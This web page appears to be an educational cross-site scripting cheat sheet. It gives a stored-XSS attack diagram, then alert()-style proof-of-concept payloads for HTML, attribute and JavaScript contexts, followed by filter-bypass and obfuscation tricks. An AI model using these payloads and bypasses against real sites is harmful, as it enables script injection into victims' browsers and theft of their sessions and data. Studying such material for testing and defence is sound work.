Skip to content
Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity. 
sequenceDiagram
    participant A as Attacker
    participant B as Web Application
    participant C as Database
    participant U as User

    A->>B: 1. Identifies Vulnerable Web App
    A->>B: 2. Injects Malicious Script via Input
    B->>C: 3. Stores Script in Database
    C->>B: 4. Retrieves Script on Request
    B->>U: 5. Serves Page with Script
    U->>U: 6. Executes Script (Browser)
    U->>A: 7. Script Sends Data to Attacker

Raw HTML Injection (Context-Based Injection)

  1. Create New HTML Tags: You can create new tags <script>, <img>, <svg>?
  2. Use Event Handlers: Use attributes that support the javascript: protocol or event handlers like onload, onerror.
  3. Client-Side Template Injection: Check if any JS engine (AngularJS, VueJS, etc.) processes the HTML content.
  4. Scriptless Injection If you can’t create executable HTML tags, consider Dangling Markup.
  5. Bypass Protections Use various encoding techniques to bypass filters and protections.

Example Payloads:

  1. Basic Payload: <script>alert(1)</script>
  2. Image Payload: <img src=x onerror=alert(1)>
  3. SVG Payload: <svg onload=alert('XSS')>
  4. Iframe Payload: <iframe src="javascript:alert(1)"></iframe>
  5. Event Handler: <img src=x onerror=alert(1)>

Inside HTML Attributes (Context-Based Injection)

  1. Escape to Raw HTML: Try to escape out of the attribute context using ">.
  2. Inject New Events/Attributes: Inject new events or attributes that support JavaScript execution.
  3. Bypass Protections: Use various encoding techniques to bypass filters and protections.

Example Payloads:

  1. Attribute Escape: "><img src=x onerror=alert(1)>
  2. Event Injection: " autofocus onfocus=alert(1) x="
  3. Protocol Injection: href="javascript:alert(1)"
  4. HTML Entity Encoding: <a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>
  5. Unicode Encoding: <img src onerror=\u0061\u006C\u0065\u0072\u0074(1)>

Inside JavaScript Code (Context-Based Injection)

  1. Escape the Tag: Inject </script> to escape the script context.
  2. Escape String Context: Use techniques to break out of string literals and execute arbitrary JS code.
  3. Template Literals: Utilize ${ ... } syntax to inject JS expressions inside template literals.
  4. Bypass Protections: Use various encoding methods to bypass protections.

Example Payloads:

  1. Escape Script Tag: </script><img src=1 onerror=alert(document.domain)>
  2. Escape String Context: '-alert(document.domain)-'
  3. Template Literals: ${alert(1)}
  4. Unicode Encoding: <script>\u0061lert(1)</script>

JavaScript Function Execution

  1. Function Parameter Injection: Indicate the name of the function to execute via a parameter, e.g., ?callback=alert(1).
  2. DOM XSS Exploitation: Pay attention to how your input is controlled and if it is used by any sink functions.

Reflection Scenarios (Debugging Client-Side JS)

  1. Intermediately Reflected: If the value of a parameter or path is reflected on the web page, you could exploit Reflected XSS.
  2. Stored and Reflected: If a value controlled by you is saved on the server and reflected every time you access a page, you could exploit Stored XSS.
  3. Accessed via JS: If a value controlled by you is accessed using JavaScript, you could exploit DOM XSS.

Contexts for XSS Exploits (Debugging Client-Side JS)

  1. Raw HTML: Reflecting input in raw HTML allows you to use tags like <img>, <iframe>, <svg>, <script> to execute JS.
  2. Inside HTML Tags Attribute: Escaping from attributes or using events that support JS execution within attributes (e.g., onclick, href="javascript:").
  3. Inside JavaScript Code: Escaping from <script> tags, strings, or using template literals for JS execution.

Special Scenarios and Bypasses (Debugging Client-Side JS)

  1. Accessing JavaScript Functions: Use parameters to control function execution, such as ?callback=alert(1).
  2. Encoding Tricks: Bypass filters using HTML encoding, Unicode encoding, URL encoding, etc.
  3. Special Protocols: Use javascript: or data: protocols in attributes like href or src.

Advanced Techniques

  1. JavaScript Hoisting: Exploit scenarios where undeclared variables or functions are used.
  2. CSS-Gadgets: Use CSS to manipulate element positioning and maximize the impact of XSS.
  3. Polyglots: Create payloads that can be executed in multiple contexts (HTML, JavaScript, etc.).

Bypasses and Obfuscation

  1. Random Capitalization: Vary the capitalization of tags and attributes (e.g., <sCrIpT>).
  2. Double Tag Injection: Use double tags to bypass single tag filters (e.g., <script><script>).
  3. Unexpected Parent Tags: Use unexpected parent tags like <svg><x><script>alert(1)</script></x></svg>.
  4. Unicode and HTML Encoding: Use Unicode or HTML entities to obfuscate payloads (e.g., \u0061lert(1), &apos;-alert(1)-&apos;).

XSS Training and Testing Platform